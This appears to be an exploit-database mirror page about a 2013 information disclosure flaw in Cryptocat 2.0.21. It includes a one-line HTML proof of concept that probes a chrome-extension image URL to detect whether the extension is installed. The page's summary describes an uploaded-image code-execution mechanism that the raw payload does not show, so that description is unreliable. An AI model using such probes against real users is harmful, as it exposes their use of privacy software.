header-logo
Suggest Exploit
vendor:
Cryptocat
by:
SecurityFocus
4,3
CVSS
MEDIUM
Information Disclosure
200
CWE
Product Name: Cryptocat
Affected Version From: Cryptocat 2.0.21
Affected Version To: Other versions may also be affected
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2013

Cryptocat Information Disclosure Vulnerability

Cryptocat is prone to an information disclosure vulnerability. An attacker can exploit this issue to gain access to sensitive information that may aid in further attacks. The vulnerability is triggered when an attacker embeds malicious code in an image file and uploads it to the application. The malicious code is then executed when the image is loaded.

Mitigation:

Upgrade to the latest version of Cryptocat.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/61090/info

Cryptocat is prone to an information disclosure vulnerability.

An attacker can exploit this issue to gain access to sensitive information that may aid in further attacks.

Cryptocat 2.0.21 is vulnerable; other versions may also be affected. 

<img src="chrome-extension://[extension-id-from-chrome-web-
store]/img/keygen.gif" onload=alert(/hascat/) onerror=alert(/hasnot/) >

Navigation

Suggest Exploit

Services By CQR